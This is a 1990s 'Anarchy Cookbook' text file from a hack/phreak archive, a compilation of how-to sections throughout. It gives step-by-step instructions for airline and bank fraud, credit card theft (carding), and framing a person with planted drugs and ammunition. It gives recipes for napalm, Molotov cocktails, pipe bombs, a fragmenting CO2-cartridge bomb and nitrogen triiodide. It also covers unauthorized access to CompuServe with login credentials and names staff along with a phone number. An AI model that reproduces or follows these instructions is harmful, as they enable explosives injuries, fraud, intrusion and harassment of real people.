home *** CD-ROM | disk | FTP | other *** search
/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / COOK2.ZIP / COOK2.TXT next >
Text File  |  1996-12-22  |  244KB  |  5,178 lines

  1.  
  2.  
  3.                          The Offical Anarchy Cookbook
  4.  
  5.                           property of James McCarthy
  6.  
  7.                                    Airlines
  8.  
  9.   Did an airline ever lose your luggage?
  10.  
  11.   Arrange to have a friend meet you at the terminal gate when you deplane.
  12. Give your friend your baggage claim checks and have him/her retrieve your bags
  13. from the carousel, then leave the baggage area with your bags.  Before your
  14. friend leaves the airport with your luggage, be sure to get your claim checks
  15. back.  Then, you saunter over to the baggage area, spend half an hour waiting
  16. for your bags.  Ask some clerks for help, then report your "missing" luggage,
  17. showing your claim checks as proof.  Very few flights ever have a clerk
  18. actually check the baggage and collect claim checks. It's foolish, but they
  19. don't.  Make a polite, but firm scene and demand satisfaction.  Normally, the
  20. airline people will have you fill out a form and they will attempt to find
  21. your luggage.  Obviously, they won't find it.  Bug them some...write them
  22. letters.  Soon, you should get a good settlement from the airline.  Don't try
  23. to pull this one on the same airline more than once!
  24.  
  25.   Leaving the airlines and aiming for the individual mark, you can do a lot of
  26. personal damage.  For instance, if you find your mark is going to use airline
  27. travel, you could call and cancel the reservations.
  28.  
  29.   You might try to slip a couple rounds of pistol ammunition or a switchblade
  30. in to your mark's pocket just before he goes through the metal detector at the
  31. airport terminal. You could also slip some drugs into his pocket at the same
  32. time.  Read a book on pick pocketing to note the technique for doing this.
  33. It's quite easy.  Leave accurate-looking, but totally bogus hijack scenario
  34. plans, bomb diagrams, or orders of battle for terrorist attacks in airport
  35. bars and restrooms.  This fires up both the rent-a-cops and the real security
  36. people.  The security delays and resultant hassles with passengers create
  37. unhappy people who are angry at airports and airlines.  Naturally, the blame
  38. for these plans must focus on your mark.  If he has really been bugging you
  39. it's about time to get even!
  40.  
  41.  
  42.                                     Animals
  43.  
  44.     If your mark is an oily cuss with a credibility problem you should easily
  45. pull off this stunt.  It involves a cop, reporters, SPCA folks and some farm
  46. animals.  Call the police and tell them you know about a cock or dog fight
  47. that's being held at your mark's home.  Explain that you have no morals
  48. against animal fighting but you lost big money there last time and think the
  49. fights are fixed.  Next call your mark and report to him that some people
  50. are holding dog or cock fights on his property.  Call the reporters and SPCA
  51. and tell them all about the fight.  Mention that your mark and the cops have
  52. a payoff relationship.  Give everyone the same general arrival time, never be
  53. too specific.  Hopefully, all will sort of show up at the same time.  You might
  54. manipulate things so the press and animal lovers show up first.  Even if a
  55. real story doesn't develop, you have scattered some strong seeds of distrust.
  56. If you want a stronger story, find a dead dog on the road or something and
  57. plant it near by and tell the reporters and SPCA where to find the evidence.
  58. It will be fun to hear your mark and the cops talk about everything to the
  59. reporters.
  60.   ∩7Å3 è
  61.     Dead animals are very useful.  Wait until your mark goes on a trip and will
  62. be leaving his car or house empty for several days.  Get into the car
  63. or house and stuff very large and very dead animals everywhere.  Your mark will
  64. probably have to sell his car and fumigate his house when he returns.
  65.  
  66.     If you are bothered by big dogs chasing you just take a good quality
  67. plastic water pistol and fill it with freshly squeezed lemon juice.  Shoot
  68. the furball right in the eyes and it'll soon stop the canine harassment.
  69.  
  70.  
  71.                           Fun with Automatic Tellers
  72.  
  73.   Preface:  This is not a particularly easy scam to pull off, as it requires
  74. either advanced hacking techniques (TRW or banks) or serious balls (trashing a
  75. private residence or outright breaking & entering), but it can be well worth
  76. your while to the tune of $500 (five hundred) a day.
  77.  
  78.   Laws that will be broken:  Credit Fraud, Wire Fraud, Bank Fraud, Mail Fraud,
  79. Theft Over $200, Forgery, and possibly a few others in the course of setting
  80. the scheme up.
  81.  
  82.   The first step is to target your victim.  The type person you are looking
  83. for is rich.  Very rich.
  84.  
  85.   Now, don't go trying to hit on J.P. Getty or Johnny Carson or someone who
  86. carries a high name recognition.  This will just get you into trouble as
  87. everyone notices a famous person's name floating across their desk.
  88.  
  89.   Instead look for someone who owns a chain of hog feed stores or something
  90. discreet like that.  We targeted a gentleman who is quite active in the silver
  91. market, owning several mines in South Africa and not wanting this to be widely
  92. known (he had no desire to be picketed.)
  93.  
  94.   Next step, take out a p.o. box in this person's name.
  95.  
  96.   Now comes the fun part, requiring some recon on your part.  You need
  97. to know some fairly serious details about this person's bank dealings.
  98.  
  99.         1)  Find out what bank he deals with mainly.  This isn't too difficult
  100.             as a quick run through his office trash will usually let you find
  101.             deposit carbons, withdrawal receipts, or *anything* that has the
  102.             bank name on it.
  103.  
  104.         2)  Find out the account number(s) that he has at the bank.  This can
  105.             usually be found on the above-mentioned receipts.  If not, you can
  106.             get them in TRW (easier said than done) or you can con them out of
  107.             a hassled bank teller over the phone (Use your imagination.  Talk
  108.             slowly and understandingly and give plausible excuses ["I work for
  109.             his car dealership, we need to do a transfer into his account"].)
  110.  
  111.         2a) [optional]  If you can, find out if he has an ATM (Automatic
  112.             Teller) card.  You don't need to know numbers or anything, just
  113.             if a card exists.  This can also be ascertained over the phone
  114.             if you cajole properly.  ∩7Å3 è
  115.         3)  Armed with this information, go into action.
  116.  
  117.                 a) Obtain some nice (ivory quality) stationary.  It doesn't
  118.                    have to be engraved or anything, but a $5 or $10 investment
  119.                    to put a letterhead with his initials or something on it
  120.                    couldn't hurt.  But the most important thing is that it
  121.                    look good.
  122.  
  123.                 b) Type a nice letter to the bank notifying them of your
  124.                    address change.  Some banks have forms you have to fill out
  125.                    for that sort of thing, so you need to check with the bank
  126.                    first (anonymously, of course).  You will have to have a
  127.                    good copy of his signature on hand to sign all forms and
  128.                    letters (again, trash his office).
  129.  
  130.                 c) Call the bank to verify the new address.
  131.  
  132.                 d) IMMEDIATELY upon verifying the change of address, send a
  133.                    second letter.  If he already has an ATM card, request a
  134.                    second card with the business name engraved in it be sent
  135.                    for company use.  If he doesn't have an ATM card, the
  136.                    letter should request one for account number xxxxxx.  Ask
  137.                    for two cards, one with the wife's name, to add
  138.                    authenticity.
  139.  
  140.                 e) Go to the bank and ask for a list of all ATM's on the
  141.                    bank's network.  Often the state has laws requiring *all*
  142.                    machines take *all* cards, so you'll probably be in good
  143.                    shape.
  144.  
  145.                 f) Await the arrival of your new card.  The PIN (personal
  146.                    identification number) is included when they send out a
  147.                    card.  After picking up the card, forget that you ever
  148.                    even *knew* where the p.o. box was, and make sure you
  149.                    didn't leave fingerprints.
  150.  
  151.                 g) Begin making the maximum daily withdrawal on the card
  152.                    (in most cases $500/day), using a different machine each
  153.                    time.  Since many of these machines have cameras on them,
  154.                    wear a hat & jacket, or a ski mask to be really paranoid.
  155.                    To cut the number of trips you have to make in half, be at
  156.                    an ATM a few minutes before midnight.  Make one $500
  157.                    withdrawal right before midnight, and another one right
  158.                    after.  This cuts down on the number of trips, but police
  159.                    or bank officials may spot the pattern and start watching
  160.                    machines around midnight.  Use your own judgement.
  161.  
  162.  
  163.   Conclusion: Before using the card, make sure that all fingerprints are wiped
  164. from it.  Usually the first hint you will have that they have caught on to
  165. your scam is that the machine will keep the card.  Also, avoid using machines
  166. in your own town unless it is a big city (Chicago, Milwaukee, Dallas,
  167. etc...). 
  168.   ∩7Å3 è                                     Bombs
  169.  
  170.                                    FIREBOMBS
  171.  
  172.      Most fire bombs are simply gasoline filled bottles with a fuel soaked
  173. rag in the bottle's mouth. The original Molotov cocktail, and still about the
  174. best, was a mixture of one part gasoline and one part motor oil. The oil helps
  175. it to cling to what it splatters on.
  176.  
  177.                                     NAPALM
  178.  
  179.      About the best fire bomb is napalm. It has a thick consistency, like
  180. jam and is best for use on vehicles or buildings.
  181.  
  182.      Napalm is simply one part gasoline and one part soap. The soap is
  183. either soap flakes or shredded bar soap. Detergents won't do.
  184.  
  185.      The gasoline must be heated in order for the soap to melt. The usual
  186. way is with a double boiler where the top part has at least a two-quart
  187. capacity. The water in the bottom part is brought to a boil and the double
  188. boiler is taken from the stove and carried to where there is no flame.
  189.  
  190.       Then one part, by volume, of gasoline is put in the top part and
  191. allowed to heat as much as it will and the soap is added and the mess is
  192. stirred until it thickens. A better way to heat gasoline is to fill a bath
  193. tub with water as hot as you can get it. It will hold its heat longer and
  194. permit a much larger container than will the double boiler.
  195.  
  196.  
  197.                                 MATCH HEAD BOMB
  198.  
  199.      Simple safety match heads in a pipe, capped at both ends, make a
  200. devastating bomb. It is set off with a regular fuse.
  201.  
  202.      A plastic Baggie is put into the pipe before the heads go in to prevent
  203. detonation by contact with the metal.
  204.  
  205.  
  206.                             FUSE IGNITION FIRE BOMB
  207.  
  208.      A four strand home made fuse is used for this. It burns like fury.  It
  209. is held down and concealed by a strip of bent tin cut from a can.  The
  210. exposed end of the fuse is dipped into the flare igniter. To use this one,
  211. you light the fuse and hold the fire bomb until the fuse has burned out of
  212. sight under the tin. Then throw it and when it breaks, the burning fuse will
  213. ignite the contents.
  214.  
  215.  
  216.                                      Bomb 2
  217.                                  The Destructor
  218.  
  219. Materials:
  220.  
  221. 1 CO2 Cartridge - Used in BB guns - come in a pack of five - Target sells them
  222.                   for $1.50 a pack.  ∩7Å3 è2 Size D Estes model rocket ines - found in most hobby stores where model
  223.                                       rockets are sold. (Any size will work but
  224.                                       D's have the most powder)
  225. 2 Solar igniters - usually come with the engines - used to ignite the bomb
  226. 1 Bottle of fast drying model glue
  227. 1 Scissors
  228. 1 Funnel
  229. 1 roll of masking tape
  230. 1 hammer
  231. 1 container (jar, cup, glass)
  232. 1 20 foot wire (+ and -)
  233. 1 6 volt (or 12 volt) lantern battery
  234.  
  235.  
  236. Procedure:
  237.  
  238.   The CO2 cartridge is the body of the bomb and when it explodes will fragment
  239. .. so stand back..  Metal flies!!
  240.  
  241.   If you have a CO2 BB gun then you will have many empty cartridges. For those
  242. of you who have never bought CO2 cartridges you will have to find some other
  243. way of emptying them. I have done this on accident before, simply insert a nail
  244. in the top of the cartridge and watch the CO2 gas come out!! Very cold if you
  245. let it touch you. I do not suggest doing it this way, so if possible, ask a
  246. friend who has a CO2 BB gun for their empty CO2 cartridges.
  247.  
  248. Make the hole bigger:
  249.  
  250.   Once you have an empty cartridge you have to make the hole bigger, otherwise
  251. it is very difficult to get the explosive compounds into the cartridge. Take a
  252. nail and pound the hole bigger. The size of the hole is very important. If it
  253. is too big the cartridge will act as a rocket instead of a bomb.
  254.  
  255. Prepare the explosive ingredients:
  256.  
  257.   Unroll the model rocket engines with a pocket knife, until you have the black
  258. chunk of boosting compound. Throw away the unrolling paper. You may remove the
  259. block of clay since this is not explosive. Powder the chunk with the hammer
  260. until you have fine powder. To make the fine powder, lay down some wax paper
  261. on the floor. Find a screen mesh, and filter the powder, leaving the big pieces
  262. on top and the fine powder on the wax paper. Then pour the powder on the wax
  263. paper into a container. After you have the two size D engines powdered and in
  264. the container you are ready to put the powder into the CO2 cartridge.
  265.  
  266. Get the ingredients in the cartridge:
  267.  
  268.   Make a funnel out of paper (a floppy disk jacket works well, with the end
  269. clipped off) and tape it around the end of the cartridge. Slowly pour the
  270. powder from the container into the funnel. You may have to use a toothpick to
  271. help the powder through the funnel and into the cartridge. If your powder is
  272. not fine enough it might jam in the hole and you will have to remove the funnel
  273. and clear the passage. Shake the cartridge every so often until you can't hear
  274. the powder in there. The cartridge is now full of explosive powder.
  275.  
  276. Prepare the igniter:
  277.   ∩7Å3 è  Clip the paper protector of the igniter with a scissors and b the wires so
  278. they are relatively straight. (Be careful not to break the igniter when bending
  279. the wires) Coat the igniter with glue except for the ends, and let it dry for a
  280. few minutes. Then insert the igniter into the cartridge leaving the ends
  281. exposed. The tip of the igniter must touch the powder for the powder to ignite.
  282. This should be no problem if you have enough powder in the cartridge. Put glue
  283. around the igniter and the tip of the cartridge and let dry.
  284.  
  285. Connecting the bomb:
  286.  
  287.   Then bend the end wires of the igniter and connect to your 20 foot wire.
  288. Put tape around the end wires and cartridge. The Destructor is now ready to
  289. detonate.
  290.  
  291. Detonating the bomb:
  292.  
  293.   When you have found a place to detonate The Destructor, stretch the
  294. wire the full 20 feet and then touch both wires to the two negative and
  295. positive connectors. This will send a 6 volt charge through the wire and to the
  296. igniter.  The igniter will ignite the explosive compounds in the cartridge and
  297. in a matter of seconds........   BOOM!!!!!!!!!!!!!!
  298.  
  299.  
  300.                                  Basic Carding
  301.  
  302.    INTRODUCTION:
  303.      This is an attempt to tutor individuals lacking in the knowledge
  304.  of how to get items from stores without actually paying for them and
  305.  not having to show up in person.  Instead, charge them to someone
  306.  else's credit card (also known as 'CC') account.  This process is
  307.  known as 'credit carding' or just 'carding' amongst people in that
  308.  field of acquiring goods.
  309.  
  310.  STEP I:
  311.  ------
  312.    ACQUIRING CREDIT CARD INFORMATION:
  313.      The first and foremost thing to do is acquire CC information.
  314.  The things that are necessary are:  name of the card holder,
  315.  expiration date, account number, and the CC type. (that is: Visa,
  316.  American Express, MasterCard, etc.)
  317.  
  318.    WHAT TO LOOK FOR:
  319.      In order to get these important bits of information, you would
  320.  have to know where to look.  The cards themselves have all of this
  321.  information right on them.  However, an easier and better place to
  322.  find these things is on the carbons that stores use to put the info.
  323.  on the different sheets to give to The CC company, themselves or
  324.  their bookkeeper, and the customer himself.  On these carbons, it
  325.  should be pretty obvious as to which is which.
  326.  
  327.    HOW-TO GET CARBONS:
  328.      The best way to get the carbons is by rooting through the trash
  329.  cans (or dumpster(s)) of a store.  This process is known as
  330.  'trashing'.  The best places to trash depends on the time of the
  331.  year in which you are looking for the carbons.  For instance, during  ∩7Å3è the Christmas season: toy stores, during major season (temperature)
  332.  changes: clothing stores, etc.  Basically, go wherever there is the
  333.  largest buying attraction during that period of time.  Whenever,
  334.  there is no major buying attraction, try independent clothing stores
  335.  or department stores.
  336.  
  337.    TRASHING CLOTHES:
  338.      I suggest that you wear some really grubby, old, etc. clothing
  339.  when you go trashing, because you never know what some of these
  340.  stores are gonna throw away.  If you are kind sqeemish, wear rubber
  341.  gloves and those pant covers that farmers use, I am not sure what
  342.  they are called, but they're made of rubber and will keep the
  343.  nasties away from you when you go trashing.
  344.  
  345.    CARBONS:
  346.      After you have gotten a considerable number (30 - 500) of
  347.  carbons, you need to identify the proper parts of the carbon. The
  348.  important parts of the carbon will look like Diagram 1 does.
  349.  
  350.                        D i a g r a m   1
  351.  +------------------------------------------------------------+
  352.  |  Account Number  exp date(1)                               |
  353.  |  exp date(2)     exp date(3)                               |
  354.  |  Card holder's name                                        |
  355.  |                                                            |
  356.  |                                                            |
  357.  |                                                            |
  358.  |                                                            |
  359.  |                                                            |
  360.  +------------------------------------------------------------+
  361.  
  362.    CARD HOLDER'S NAME:  (SEE DIAG. 1)
  363.      The card holder's name should be quite clear on all carbons
  364.  that you find in the same place as on diagram one.  If it is not
  365.  there, it should be easy to distinguish from any other information
  366.  on the carbon.
  367.  
  368.    EXP. DATES:  (SEE DIAG. 1)
  369.      The expiration dates can be in two forms.  The forms are
  370.  thus:  XX/XX THRU XX/XX which would be found on exp date(2) and
  371.  is used on American Express cards, and XX-XX which is found in
  372.  either exp date(1) or exp date(3) and is for either VISA or
  373.  MasterCard.
  374.  
  375.     ACCOUNT NUMBER: (SEE DIAG. 1)
  376.       Account numbers are generally found in the top, left-hand
  377.  corner of the carbon.  They can be found in other places, but that
  378.  is the most common.
  379.  
  380.     CARD TYPE:
  381.       The formats of account numbers are quite varied between CC
  382.  companies. Diagram 2 shows which major card types use which
  383.  formats. You can use diagram two, or a reasonable facsimile, for
  384.  identification of CC types on your carbons.  If the number is not
  385.  of any of these formats, discard that carbon, for it'd not be of a  ∩7Å3 è major accepted gender.
  386.  
  387.                           D i a g r a m   2
  388.            +----------------------=----------------------+
  389.            | CC type              | Format of the act. # |
  390.            +----------------------=----------------------+
  391.            | American Express     | XXXX XXXXXX XXXXX    |
  392.            | MasterCard           | XXXX XXXX XXXX XXXX  |
  393.            | Revolv-a-charge      | NXXN XXXX NXXXXX X   |
  394.            | Visa                 | XXXX XXX XXX XXX     |
  395.            +----------------------=----------------------+
  396.                                     X represents a number
  397.                                     N represents a letter
  398.  
  399.  STEP II:
  400.  -------
  401.     THE DROP SPOT:
  402.       Before you order your merchandise, you must figure out a place
  403.  to send the merchandise.  You do ** NOT **  want the store from
  404.  which you shop, the card holder, or the CC company to know where you
  405.  really live.
  406.  
  407.     QUALIFICATIONS:
  408.       In order for a house to qualify as an inconspicuous drop spot,
  409.  it must meet several requirements.  It must look like a place where
  410.  people could really live and be getting things sent through UPS to
  411.  them.  It must be a place that the owners will not 'visit' too
  412.  regularly.  It may have a 'FOR SALE' sign in front of it, but it is
  413.  better if it doesn't.  And most important of all, it must be a place
  414.  that you can check up on often. Make sure you WRITE DOWN the address
  415.  in a place where you will NOT forget it and where it will be readily
  416.  accessible when you are ordering merchandise. (SEE STEP III)
  417.  
  418.  STEP III:
  419.  --------
  420.     ORDERING MERCHANDISE:
  421.       If you have a catalog or something that you are ordering from,
  422.  then follow the directions given in the book for making phone
  423.  orders.  Make sure the address given is the drop spot's address,
  424.  and NOT yours.  If your voice doesn't sound mature enough to be an
  425.  adults, the order-taker might be suspicious.  There are two ways to
  426.  solve this.  The first is to tell the order taker that you are
  427.  doing this for your parents 'cause they are too busy to order it,
  428.  so they made you do it.  This is risky.  The second and better one
  429.  is to have someone else order it (WHILE YOU WATCH HIM/HER!) for
  430.  you.  The person that does this should be VERY trustworthy. Be sure
  431.  to know the expected time of delivery. (SEE STEP IV)
  432.  
  433.  STEP IV:
  434.  -------
  435.      THE PICK-UP:
  436.        You should leave a little note inside the front door or
  437.  hanging in some place that even the dumbest UPS driver could see.
  438.  This note should be typed or printed and give directions as to
  439.  where to leave the package(s).  Things like the back porch or under  ∩7Å3è a tarpaulin or in a box on the front porch usually work best.  And
  440.  say something to the effect of each family member working and that
  441.  you have a tight schedule and anything other than leaving it where
  442.  mentioned would be very inconvenient for you.  You then approach
  443.  the building every other night starting the day after the expected
  444.  delivery to get your 'present'.
  445.  
  446.  
  447.  
  448.                                  Credit Checks
  449.  
  450.      When you somehow obtain a card, before you order something, you must first
  451. check the card to see if it is good.  Here is how to do that:
  452.  
  453.  Dial:  1-800-554-2265
  454.  
  455.  10# - Mastercard
  456.  20# - Visa
  457.  1067# - Auth. #
  458.  51# -Merchant Number
  459.  
  460.  CC number + # - when asked for card number
  461.  MMYY + # - When asked for exp. date
  462.  Dolars+*+Cents+# - When asked for amount
  463.  
  464.     Now, here is what you must do to check the limit of the card.  Call up and
  465. enter all the card stuff and when it says amount start at 5000*00#, and it will
  466. almost ALWAYS say declined, unless it is a Preferred or Gold card. From them
  467. on, go down in $1000 increments until it says approved and gives you an auth.
  468. number to write on the customers receipt. Then enter $500, it should say
  469. declined, if it doesn't and says approved, check it for 500 again, then it will
  470. say declined.
  471.  
  472.  
  473.  
  474.                                    Cherry Bomb
  475.  
  476. Materials:
  477.  
  478.  1. Ping pong ball.
  479.  2. Black powder.
  480.  3. Fuse, at least 5 in.
  481.  4. Nail polish.
  482.  5. Any type of tape.
  483.  
  484. Procedure:
  485.  
  486.  1. Use an ice pick to poke a hole in the ping pong ball, then use a razor
  487.     blade to make a big enough hole to put the black powder in.
  488.  2. Place the black powder in. Probably 3/4 full is best.
  489.  3. Now, insert the fuse into the ice pick hole.
  490.  4. Cover the entire ball with nail polish. This is used to make it louder.
  491.  5. Finally, cover the whole thing with tape, also used for loudness.
  492.  
  493.   ∩7Å3 è
  494.                     Hacking the Compuserve Infomation Service
  495.  
  496.     Compuserve is a multiuser networked Pay by Hour service. But this can
  497.     be beat. At current rates, CIS (Compuserve) charges $6.50 for 300 baud
  498.     and $12.75 for 1200/2400 baud, 9600 can only be accessed by Hardwired
  499.     clients. Thus you see the need for this file. At the time this was
  500.     written, all information in this file was correct. Enough of this, on
  501.     to the file.
  502.  
  503.     Logging on to Compuserve
  504.     ------------------------
  505.     In order to logon to CIS you need one of the following.
  506.      1) A Telenet, Tymnet, Or CIS Port
  507.      2) A Credit Card
  508.      3) Above the IQ of a houseplant
  509.     That is all you need, I know for some of you the 3rd one is tough, but
  510.     try. Ok, you have all this, call your local port, logon to CIS, then
  511.     you should get a [User ID:] Prompt, type [177000,5000], this is the Ziff
  512.     PCMagnet User Id. Now, if you entered it correctly, then you should get
  513.     the [Password:] Prompt, at This type [Pc*Magnet]. You will next be given
  514.     a Welcome Message, then, you will get yet another Prompt. It should ask
  515.     you for your Agreement Number, type [Z10D8810]. That is the end of the
  516.     prompts. Here's where the IQ of above a houseplant comes into play.
  517.     You now have to think. It will ask you various questions, ranging from
  518.     your country to your Social Security number. Answer them however you
  519.     want, but I wouldn't use your real info. If you want the second password
  520.     (Needed to access some things), you will have to give an address where
  521.     you can drop by and pick it up. Some ideas are sending to your neighbors,
  522.     but use your last name, it will end up at your house. This is safe, I
  523.     have used it. Or you can rent a Post Office box for about 6 months.
  524.     Once you have done all this, and answer the questions, and read the
  525.     propoganda, you will see [Entering PCMagnet]. You are done.
  526.  
  527.     So what do I do Now?
  528.     --------------------
  529.     Ok, if you get this far, you have the IQ of above your fern. You can
  530.     go one of two places, CIS or PCMagnet (Where you are now). You can
  531.     stay in PCMagnet, but there isn't much there. So, I would type [Go Cis]
  532.     This will bring you to Compuserve. Once on CIS, you can do many thing,
  533.     ranging from downloading files, to real time chat on forums to online
  534.     games. Next, I will list some interesting places to go.
  535.  
  536.     Where do I go?
  537.     --------------
  538.     There are alot on interesting places to go on Compuserve. There are
  539.     some places that you can't access without a second password, so that
  540.     must be attained to get on CB. But you can goto the forums, the
  541.     games, and alot of other things. I will list some places that I like
  542.     to go.
  543.      [Go Rocknet] will bring you to a rather nice forum that is populated
  544.                   by some very nice people. It has confrences at 7am till
  545.                   9am (Breakfast Club), at 12pm till 1pm (Lunch Bunch),
  546.                   and from around 10pm till 1am. I can be found in this
  547.                   forum alot.  ∩7Å3 è     [Go Hsx100]  will bring you the Human Sexuality Forum, but it's
  548.                   not what you think, they are very interesting people
  549.                   that hang around here. The Confrence's there are from
  550.                   around 10pm till about 4am. They last along time.
  551.     These are just my favorites, but if you type [Go Forums], it will
  552.     give you a list of forums that you can Hang around on. There are
  553.     some things to look out for on CIS.
  554.  
  555.     Some sights you will see
  556.     ------------------------
  557.     There are some things to look out for on CIS. You must be careful
  558.     when you see one of these things. They are on the look out for US.
  559.     If you see a [70000,xxxx] id, that is a Security Officer, they will
  560.     deleate you if you are not careful. If you see a [70006,xxxx] that
  561.     is a Wizard, he can also deleate you. They some times do not deleate
  562.     you they just /gag you, that means you can't be seen, you are not in
  563.     the userlist. This only applys to Confrence and CB. *LooLoo* is a
  564.     person to be careful not to see, she is a mother fucker. She is a
  565.     powerful person, she can /gag you on any forum, but SHE CAN NOT
  566.     deleate you, only a security account can. Her user id is [70006,522]
  567.     so if you see that ID, be careful. I have talked to her voice on
  568.     several occassions, she is fun to call and bother about CIS, if you
  569.     want her number, it is [614/764-2302] Her real name is Patricia
  570.     Phelps. There is also another not so nice person on Compuserve , he
  571.     is Dan Piskur, he is the Head of Security. He uses the Handles,
  572.     [Dan'l or Ghost] he CAN deleate you on sight.
  573.  
  574.     Misc Info.
  575.     ----------
  576.     Here's come info on Project Numbers. (User Id's)
  577.     70000,xxxx = CIS Security     70003,xxxx = CIS Employe
  578.     70004,xxxx = CIS Employe      70005,xxxx = Radio Shack Demo
  579.     70006,xxxx = Wizard           70007,xxxx = Complementary Account
  580.     76701,xxxx = Forum Sysop      76703,xxxx = Forum Sysop
  581.     76704,xxxx = Forum Sysop      72251,xxxx = Ziff Account (You)
  582.     72261,xxxx = Ziff Account     72271,xxxx = Ziff Account
  583.     72301,xxxx = Ziff Account
  584.     Some things, a Wizard is a very powerful person, they have access
  585.     to /gag you. A Ziff account is an account created by this method.
  586.  
  587.  
  588.  
  589.                              Change Machine Fraud
  590.  
  591.  I.
  592.    There are certain types of money changing machines...The one YOU need is
  593. the kind where ya put yer bill in the tray <lengthwise> ,push the tray in to
  594. get yer change...
  595.  
  596.  II.
  597.    Once you got the right machine,get a $5 or a $1 ,it helps if the bill is
  598. WRINKLED...Then tear a notch in the bill on the lower left side of the bill.
  599. Cut the notch about 3.5 cm. from the lower left hand corner...
  600.  
  601. III.  ∩7Å3 è    Now, go to the machine..put the bill in the tray and sl it in...  Now
  602. what will happen is the machine will have so far read the bill right and it
  603. will spit out yer change..  Then when it reads the notch, it will think the
  604. bill is fucked up and reject it  and like you will have the change  and yer
  605. bill...
  606.  
  607.  For this to werk right you must have done this right..it does take practice
  608. but once you can do this your local Money Changer will be yer bank...
  609.  
  610.  
  611.  
  612.  
  613.  
  614.                       How to Pick Master Combination Locks
  615.  
  616.  
  617.  
  618.     1st number:
  619.  
  620.               Get out any of the Master locks so you know what's going on.  The
  621.               handle part (the part that springs open when you get the
  622.               combination), pull on it, but not enough so that the knob won't
  623.               move.  While pulling on it turn the knob to the left until it
  624.               won't move any more. Then add 5 to this number. Congradulations,
  625.               you now have the 1st number.
  626.  
  627.     2nd number:
  628.  
  629.               Ok, spin the dial around a couple of times, then go to the 1st
  630.               number you got, then turn it to the right, bypassing the 1st
  631.               number once. WHEN you have bypassed. Start pulling the handle and
  632.               turning it.  It will eventually fall into the groove and lock.
  633.               While in the groove pull on it and turn the knob. If it is loose
  634.               go to the next groove; if it's stiff you got the second number.
  635.  
  636.     3rd number:
  637.  
  638.               After getting the 2nd, spin the dial, then enter the 2 numbers,
  639.               then after the 2nd, go to the right and at all the numbers pull
  640.               on it.  The lock will eventually open if you did it right. If
  641.               can't do it the first time, be patient, it takes time.
  642.  
  643.  
  644.  
  645.                        Preparation of Contact Explosives
  646.  
  647.   The contact explosives we will be describing use only a few chemicals. Some
  648. do need extra caution to keep from causing trouble.
  649.  
  650. Iodine Crystals
  651.  
  652.   Though most people don't realize it, Iodine is not a brown liquid, but a
  653. steel-grey solid. The tincture of iodine you buy at the drugstore actually
  654. contains just a tiny bit of iodine dissolved in a jarful of inexpensive
  655. alcohol, and resold at a huge mark up. We'll be using iodine in the crystalline  ∩7Å3 èform. On contact with your skin, it will produce a dark stain that won't wash
  656. off with soap and water. We'll talk about removing these stains later. If it
  657. gets hot, it vaporizes into a purple cloud, that smells like the chlorine in a
  658. swimming pool. This cloud is dangerous to inhale, since it will condense in
  659. your lungs, and is corrosive. Since we won't need to heat this stuff, it is not
  660. a problem, but you should make sure that you don't let any iodine crystals
  661. spill onto a hot surface. If you don't touch it and keep it away from your
  662. face, you shouldn't have any troubles.
  663.  
  664. Ammonium Hydroxide
  665.  
  666.   This is just good old household ammonia. Be sure to get the clear kind. The
  667. sudsy stuff won't be too useful. It is made from ammonia gas dissolved in
  668. water, and every time you open the bottle, it loses some of its strength, so be
  669. sure to use fresh stuff. We need it to be as strong as possible. Some of the
  670. formulas given here use lab grade concentrated ammonium hydroxide. It is much
  671. stronger than the supermarket kind, and is very unkind to skin or especially
  672. the eyes. It is a good idea to wear eye protection with even the supermarket
  673. grade. Though we don't usually worry about this when using household ammonia
  674. for cleaning, we usually dilute it for that. Here we'll be using it straight
  675. out of the bottle, and it is much more corrosive in that form. Never use this
  676. material if you don't have real good ventilation, as the ammonia vapors can be
  677. overpowering.
  678.  
  679. Potassium Iodide
  680.  
  681.   This is a reasonably safe chemical. You get Potassium ions in some of the
  682. fruit you eat, and Iodide ions (usually as Sodium Iodide) are added to the
  683. table salt you buy at the store. So, while you don't directly eat this
  684. chemical, you do eat the components that make it up. Don't be scared of this
  685. stuff.
  686.  
  687.  
  688. Sodium Thiosulfate
  689.  
  690.   Otherwise known as photographic hypo. When dissolved in water, this will
  691. remove the iodine stains left by touching iodine crystals, and exploding
  692. contact explosive. Not particularly nasty stuff, but make sure to wash it off
  693. after cleaning yourself with it.
  694.  
  695.                            General Information
  696.  
  697.   This is a powerful and highly sensitive explosive. A dust sized particle will
  698. make a sharp crack or popping sound. A piece the size of a pencil lead will
  699. produce an explosion as loud as any of the largest firecrackers or cherry
  700. bombs.  It cannot be exploded by any means when wet, and therefore can be
  701. handled and applied with safety. When dry, it will explode with the touch of a
  702. feather, or a breath of air.
  703.  
  704.   The strength of the ammonia water you use will have a direct effect on the
  705. strength of the final product. If you use supermarket ammonia, the explosive
  706. will work, but not as spectacularly as if you use a 15% or higher (10 to 15
  707. molar) solution. The stronger it is, the better. You'll also need filter paper,
  708. and a funnel. A properly folded coffee filter will do nicely if you don't have
  709. the filter paper. If you're not sure how to fold filter paper, check an  ∩7Å3 èelementary chemistry textbook.
  710.  
  711.                           Methods of Preparation
  712.  
  713. 1.) Granular Explosive. This is the easiest kind, and the only kind that will
  714. work reasonably well with supermarket ammonia. Crush enough iodine crystals to
  715. make a pile of powder equal to the volume of a pencil eraser. Do not grind into
  716. a fine powder. Put about 4 ounces or 1/2 measuring cup of strong ammonia water
  717. into a small container with the iodine, and seal it for about 5 to 10 minutes,
  718. shaking frequently. While the mixture is reacting, get your filter paper ready.
  719. While it is best to consult a book that shows how to do this, you take the
  720. circle of filter paper, fold it in half, fold it again at right angles to the
  721. first fold, and then open it to form a cone. Open or close it as needed to make
  722. it conform to the angle of the funnel, and moisten it a little to make it stick
  723. in place. Place the funnel over a container that will catch the waste liquid.
  724. Let the mixture settle long enough for the sediment to settle, and pour off as
  725. much of the clear liquid as possible before filtering the sediment. Pour the
  726. remaining liquid and sediment into the filter. The sediment (and the filter
  727. paper covered with it!!!) is your explosive. The small amount you have made
  728. will go a lot farther than you realize. Particularly if you used good strong
  729. ammonia. Place the explosive in an airtight leakproof pill bottle. As this
  730. explosive is unstable by nature, fresh amounts give better results than stale
  731. ones that have been sitting around for a day or so. Best results are obtained
  732. with small fresh batches. But as you'll see, there are a few tricks you can do
  733. with this material that do require it to sit for a day or more.
  734.  
  735. The explosive should be stored and applied while wet.
  736.  
  737. 2.) Paint type explosive. This will use up a lot of iodine crystals. Make up a
